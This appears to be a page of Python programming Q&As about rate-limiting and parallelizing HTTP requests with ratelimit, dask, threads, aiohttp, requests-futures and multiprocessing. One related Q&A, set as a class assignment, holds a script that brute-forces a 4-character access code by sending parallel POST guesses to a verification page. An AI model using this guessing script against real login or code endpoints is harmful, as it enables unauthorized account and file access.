I am using the Google Places API, which has a query-per-second (QPS) limit of 10, meaning I cannot make more than 10 requests within any one second. With serial execution this wouldn't be an issue: the API's average response time is 250 ms, so I would only manage about 4 calls per second.
To use the full 10 QPS I switched to multithreading and made the API calls in parallel. But now I need to cap the number of calls in any second at 10 (the Google API starts throwing errors if I cross the limit).
Below is the code I have so far. I cannot figure out why the program sometimes just gets stuck, or takes a lot longer than it should.
import time
import random
from threading import Lock
from concurrent.futures import ThreadPoolExecutor as pool
import concurrent.futures
import requests

def make_parallel(func, qps=10):
    lock = Lock()
    threads_execution_que = []
    limit_hit = False

    def qps_manager(arg):
        current_second = time.time()
        lock.acquire()
        if len(threads_execution_que) >= qps or limit_hit:
            limit_hit = True
            if current_second - threads_execution_que[0] <= 1:
                time.sleep(current_second - threads_execution_que[0])
        current_time = time.time()
        threads_execution_que.append(current_time)
        lock.release()

        res = func(arg)

        lock.acquire()
        threads_execution_que.remove(current_time)
        lock.release()
        return res

    def wrapper(iterable, number_of_workers=12):
        result = []
        with pool(max_workers=number_of_workers) as executer:
            bag = {executer.submit(func, i): i for i in iterable}
            for future in concurrent.futures.as_completed(bag):
                result.append(future.result())
        return result

    return wrapper
@make_parallel
def api_call(i):
    min_func_time = random.uniform(.25, .3)
    start_time = time.time()
    try:
        response = requests.get('https://jsonplaceholder.typicode.com/posts', timeout=1)
    except Exception as e:
        response = e
    if (time.time() - start_time) - min_func_time < 0:
        time.sleep(min_func_time - (time.time() - start_time))
    return response

api_call([1] * 50)
Ideally the code should take no more than about 1.5 seconds, but currently it takes 12-14 seconds.
The script speeds up to its expected pace as soon as I remove the QPS-manager logic.
Please suggest what I am doing wrong, and also whether there is an existing package that provides this mechanism out of the box.
It looks like ratelimit does just that:

from ratelimit import limits, sleep_and_retry

@make_parallel
@sleep_and_retry
@limits(calls=10, period=1)
def api_call(i):
    try:
        response = requests.get("https://jsonplaceholder.typicode.com/posts", timeout=1)
    except Exception as e:
        response = e
    return response
EDIT: I did some testing and it looks like @sleep_and_retry is a little too optimistic, so just increase the period a little, e.g. to 1.2 seconds:

@limits(calls=10, period=1.2)

A quick sanity check:

from datetime import datetime, timedelta

s = datetime.now()
api_call([1] * 50)
elapsed_time = datetime.now() - s
print(elapsed_time > timedelta(seconds=50 / 10))
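For reference, the sliding-window throttle that the question's qps_manager is aiming for can also be hand-rolled with the standard library alone. This is a minimal sketch (hypothetical class name, not production code) in which acquire() blocks until another call is allowed:

```python
import time
import threading
from collections import deque

class SlidingWindowLimiter:
    """Allow at most `qps` acquisitions inside any one-second window."""

    def __init__(self, qps=10):
        self.qps = qps
        self.lock = threading.Lock()
        self.calls = deque()  # monotonic timestamps of recent acquisitions

    def acquire(self):
        # Sleeping while holding the lock deliberately serializes waiters,
        # which keeps the bookkeeping simple for a sketch like this.
        with self.lock:
            now = time.monotonic()
            while self.calls and now - self.calls[0] >= 1:
                self.calls.popleft()  # drop timestamps older than one second
            if len(self.calls) >= self.qps:
                time.sleep(1 - (now - self.calls[0]))  # wait until the oldest expires
                self.calls.popleft()
            self.calls.append(time.monotonic())
```

Each worker thread would call limiter.acquire() immediately before its requests.get(...), so no more than qps calls start in any one-second window.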
Related
I need to return a tuple from a task, and the tuple has to be unpacked in the main process because each element will go to a different dask task. I would like to avoid unnecessary communication, so I think the tuple elements should be Futures.
The best way I came up with is to scatter the data back to the same worker to obtain a future. Is there a better way to do it?
import numpy as np
import time
from dask.distributed import Client
from dask.distributed import get_client, get_worker

def other_task(data):
    return len(data)

def costly_task():
    start = time.time()
    client = get_client()
    data = np.arange(100000000)
    metadata = len(data)
    print('worker time', time.time() - start)
    start = time.time()
    future_data = client.scatter(data, workers=[get_worker().id])
    future_metadata = client.scatter(metadata, workers=[get_worker().id])
    print('scatter time', time.time() - start)
    return future_data, future_metadata

if __name__ == '__main__':
    client = Client(processes=True)
    start = time.time()
    future_data, future_metadata = client.submit(costly_task).result()
    metadata = future_metadata.result()
    print('costly task time', time.time() - start)
    other_metadata = client.submit(other_task, future_data).result()
    print('total time', time.time() - start)
The times I get with the script above are:
worker time 0.12443423271179199
scatter time 0.7880995273590088
costly task time 0.923513650894165
total time 0.9366424083709717
It is possible via delayed:

from dask.distributed import Client
from dask import delayed

@delayed(nout=3)
def costly_task():
    return 1, 2, 3

client = Client(processes=True)
a, b, c = costly_task()  # these are delayed
future_a, future_b, future_c = client.compute([a, b, c])  # split results
See this Q&A for further details.
I have code that needs to make HTTP requests (let's say 1000). So far I have tried three approaches with 50 requests; the results and code are below.
The fastest is the threading approach, but the issue is that I lose some data (from what I understood, due to the GIL). My questions are the following:
My understanding is that the correct approach in this case is multiprocessing. Is there any way to improve the speed of that approach? Matching the threading time would be great.
I would guess that the more links I have, the longer the serial and threading approaches take, while the multiprocessing approach should grow much more slowly. Do you have any source that would let me estimate the time it takes to run the code with n links?
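As a rough model for that estimate, the following sketch assumes every request takes a fixed time, threads overlap perfectly, and all coordination overhead is ignored (the function name and the 0.2 s default are illustrative assumptions, not measurements):

```python
import math

def estimated_runtime(n_links, seconds_per_request=0.2, workers=50):
    """Back-of-the-envelope runtimes for n I/O-bound requests."""
    serial = n_links * seconds_per_request                          # one after another
    threaded = math.ceil(n_links / workers) * seconds_per_request   # perfect overlap, in batches
    return serial, threaded
```

Under this model serial time grows linearly in n, while the threaded time grows linearly in n divided by the worker count; real numbers will be worse because of connection setup, server throttling, and scheduler overhead.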
Serial - Time To Run around 10 seconds

def get_data(link, **kwargs):
    data = requests.get(link)
    if "queue" in kwargs and isinstance(kwargs["queue"], queue.Queue):
        kwargs["queue"].put(data)
    else:
        return data

links = [link_1, link_2, ..., link_n]
matrix = []
for link in links:
    matrix.append(get_data(link))
Threads - Time To Run around 0.8 of a second

def get_data_thread(links):
    q = queue.Queue()
    for link in links:
        data = threading.Thread(target=get_data, args=(link, ), kwargs={"queue": q})
        data.start()
    data.join()
    return q

matrix = []
q = get_data_thread(links)
while not q.empty():
    matrix.append(q.get())
Multiprocessing - Time To Run around 5 seconds

def get_data_pool(links):
    p = mp.Pool()
    data = p.map(get_data, links)
    return data

if __name__ == "__main__":
    matrix = get_data_pool(links)
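Incidentally, the dropped data in the threaded version is more likely caused by joining only the last thread (so the queue is read before every worker has finished) than by the GIL. A hedged sketch of an executor-based variant that keeps every result; fetch here stands in for a per-link function like get_data above:

```python
from concurrent.futures import ThreadPoolExecutor

def fetch_all(links, fetch, workers=50):
    # ThreadPoolExecutor.map waits for every task and preserves input order,
    # so no result can be lost the way it can with unjoined threads.
    with ThreadPoolExecutor(max_workers=workers) as ex:
        return list(ex.map(fetch, links))
```

Usage would be matrix = fetch_all(links, get_data).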
If I were to suggest anything, I would go with AIOHTTP. A sketch of the code (note that resp.data() does not exist in aiohttp; use resp.text() or resp.json(), and gather the coroutines instead of running the event loop once per link):

import aiohttp
import asyncio

async def fetch(session, link):
    async with session.get(link) as resp:
        return await resp.text()

async def main(links):
    async with aiohttp.ClientSession() as session:
        return await asyncio.gather(*(fetch(session, link) for link in links))

if __name__ == "__main__":
    links = [link_1, link_2, ..., link_n]
    matrix = asyncio.run(main(links))
So here's the problem: our security teacher made a site that requires authentication and then asks for a 4-character code to give access to a file. He told us to write a brute-force program in Python (any library we want) that can find the password. To start, I wrote a program that tries random combinations in that code field, just to get an idea of the time per request (I'm using the requests library), and the result was disappointing: each request takes around 8 seconds.
With some calculations: 36^4 = 1,679,616 possible combinations, which at 8 s per request is about 13,436,928 seconds, i.e. around 155.5 days.
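Spelling the arithmetic out (the combination count is 36^4, not 4^36; 13,436,928 is the number of seconds):

```python
combinations = 36 ** 4        # 36-symbol alphabet, 4 characters
seconds = combinations * 8    # at ~8 s per request
days = seconds / 86400        # 86400 seconds in a day
```

So serial random guessing is hopeless at this request rate; the gain has to come from parallel requests and exhaustive (non-repeating) enumeration.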
I would really appreciate it if anyone could help me make this faster. (He told us it is possible to make around 1200 attempts per second.)
Here's my code:
import requests
import time
import random

def gen():
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    pw_length = 4
    mypw = ""
    for i in range(pw_length):
        next_index = random.randrange(len(alphabet))
        mypw = mypw + alphabet[next_index]
    return mypw
t0 = time.process_time()  # time.clock() was removed in Python 3.8
t1 = time.time()
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}
for i in range(0, 5):
    t2 = time.process_time()
    t3 = time.time()
    values = {'RECALL': gen()}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    print("##################################")
    print("cpu time for req ", i, ":", time.process_time() - t2)
    print("wall time for req ", i, ":", time.time() - t3)
    print("##################################")
print("##################################")
print("Total cpu time:", time.process_time() - t0)
print("Total wall time:", time.time() - t1)
Thank you
A thing you could try is to use a Pool of workers to make multiple requests in parallel, passing one password to each worker. Something like:

import itertools
import requests
from multiprocessing import Pool

alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}

def pass_generator():
    for pass_tuple in itertools.product(alphabet, repeat=4):
        yield ''.join(pass_tuple)

def check_password(password):
    values = {'RECALL': password}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    # Check the response here.

pool = Pool(processes=NUMBER_OF_PROCESSES)
pool.map(check_password, pass_generator())
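Since each attempt is network-bound rather than CPU-bound, a thread-backed pool may work as well as processes without the process start-up cost. A sketch using multiprocessing.dummy (same Pool API, backed by threads); check_password here is a stand-in that matches a known value instead of the real POST:

```python
import itertools
from multiprocessing.dummy import Pool as ThreadPool  # threads, same API as Pool

alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"

def candidates(length=4):
    # exhaustive enumeration instead of random guessing:
    # no repeats, guaranteed full coverage of the key space
    for tup in itertools.product(alphabet, repeat=length):
        yield ''.join(tup)

def check_password(password):
    # stand-in for the real POST to verif.php; returns the password on a hit
    return password if password == "zz" else None

with ThreadPool(32) as pool:
    hits = [p for p in pool.imap_unordered(check_password, candidates(length=2)) if p]
```

imap_unordered streams results as workers finish, so the generator never has to be fully materialized in memory.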
My current code as it stands prints an empty list. How do I wait for all the requests and their callbacks to finish before continuing with the rest of the code?
from requests_futures.sessions import FuturesSession
from time import sleep

session = FuturesSession(max_workers=100)
i = 1884001540 - 100
list = []

def testas(session, resp):
    print(resp)
    resp = resp.json()
    print(resp['participants'][0]['stats']['kills'])
    list.append(resp['participants'][0]['stats']['kills'])

while i < 1884001540:
    url = "https://acs.leagueoflegends.com/v1/stats/game/NA1/" + str(i)
    temp = session.get(url, background_callback=testas)
    i += 1

print(list)
From looking at session.py in requests-futures-0.9.5.tar.gz, it's necessary to create a future and then wait on its result, as shown in this code:

from requests_futures.sessions import FuturesSession

session = FuturesSession()
# request is run in the background
future = session.get('http://httpbin.org/get')
# ... do other stuff ...
# wait for the request to complete, if it hasn't already
response = future.result()
print('response status: {0}'.format(response.status_code))
print(response.content)
As shown in the README.rst, a future can and should be created for every session.get() and waited on to complete.
This might be applied in your code as follows, starting just before the while loop:

futures = []
while i < 1884001540:
    url = "https://acs.leagueoflegends.com/v1/stats/game/NA1/" + str(i)
    futures.append(session.get(url, background_callback=testas))
    i += 1

for f in futures:
    response = f.result()
    # the following print statements may be useful for debugging
    # print('response status: {0}'.format(response.status_code))
    # print(response.content, "\n")

print(list)

I'm not sure how your system will respond to a very large number of outstanding futures, so another way to do it is to process them in smaller groups, say 100 or 1000 at a time. It would be wise to test the script with a relatively small number at first to find out how fast results come back.
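The grouping idea can be sketched with a small stdlib helper (chunked is an assumed name, not part of requests-futures):

```python
from itertools import islice

def chunked(iterable, size):
    """Yield successive lists of at most `size` items from any iterable."""
    it = iter(iterable)
    while True:
        batch = list(islice(it, size))
        if not batch:
            return
        yield batch
```

For each batch you would submit one session.get() future per URL, drain all of their .result() calls, and only then move to the next batch, so at most `size` requests are ever in flight.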
From https://pypi.python.org/pypi/requests-futures:

from requests_futures.sessions import FuturesSession

session = FuturesSession()
# first request is started in background
future_one = session.get('http://httpbin.org/get')
# second request is started immediately
future_two = session.get('http://httpbin.org/get?foo=bar')
# wait for the first request to complete, if it hasn't already
response_one = future_one.result()

So it seems that .result() is what you are looking for.
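requests-futures is a thin wrapper over concurrent.futures, so the same submit-then-result() pattern can be demonstrated with the standard library alone; slow_square here is a stand-in for a network call:

```python
from concurrent.futures import ThreadPoolExecutor

def slow_square(x):
    # stand-in for a network request
    return x * x

with ThreadPoolExecutor(max_workers=4) as ex:
    futures = [ex.submit(slow_square, n) for n in range(5)]
    results = [f.result() for f in futures]  # .result() blocks until each future completes
```

Collecting .result() from every submitted future is exactly the missing step in the question's code.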
Another confused parallel coder here!
Our internal Hive database has an API layer which we need to use to access the data. There is a 300-second query timeout, so I wanted to use multiprocessing to execute multiple queries in parallel:
from multiprocessing import Pool
import pandas as pd
import time
from hive2pandas_anxpy import Hive2Pandas  # custom module for querying our Hive db and converting the results to a Pandas dataframe
import datetime

def run_query(hour):
    start_time = time.time()
    start_datetime = datetime.datetime.now()
    query = """SELECT id, revenue from table where date='2014-05-20 %s' limit 50""" % hour
    h2p = Hive2Pandas(query, 'username')
    h2p.run()
    elapsed_time = int(time.time() - start_time)
    end_datetime = datetime.datetime.now()
    return {'query': query, 'start_time': start_datetime, 'end_time': end_datetime, 'elapsed_time': elapsed_time, 'data': h2p.data_df}

if __name__ == '__main__':
    start_time = time.time()
    pool = Pool(4)
    hours = ['17', '18', '19']
    results = pool.map_async(run_query, hours)
    pool.close()
    pool.join()
    print(int(time.time() - start_time))
The issue I'm having is that one of the queries always returns no data, yet when I run the same query in the usual fashion it does return data. Since I'm new to multiprocessing, I'm wondering if there are any obvious issues with how I'm using it above?
I think the issue you are having is that the results object is not ready by the time you want to use it. Also, since you have a known timeout, you can use it to your advantage in the code.
The example below forces a timeout after 300 seconds if the results have not all been collected by then.
if __name__ == '__main__':
    start_time = time.time()
    hours = ['17', '18', '19']
    with Pool(processes=4) as pool:
        results = pool.map_async(run_query, hours)
        print(results.get(timeout=300))
    print(int(time.time() - start_time))
Otherwise you should still be using results.get() to return your data, or specify a callback function for map_async.
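The callback route can be sketched with a thread-backed pool, which shares the Pool API and runs safely without a __main__ guard; run_query here is a stand-in for the real Hive query:

```python
from multiprocessing.dummy import Pool  # thread pool; same API as multiprocessing.Pool

collected = []

def run_query(hour):
    # stand-in for the real Hive query
    return {'hour': hour, 'rows': int(hour) * 10}

with Pool(4) as pool:
    # the callback receives the complete result list once every query finishes
    async_result = pool.map_async(run_query, ['17', '18', '19'], callback=collected.extend)
    results = async_result.get(timeout=300)  # blocks; raises TimeoutError if queries outrun the limit
```

Either way, nothing should read the results until .get() returns (or the callback has fired), which is the likely cause of the "missing" query data.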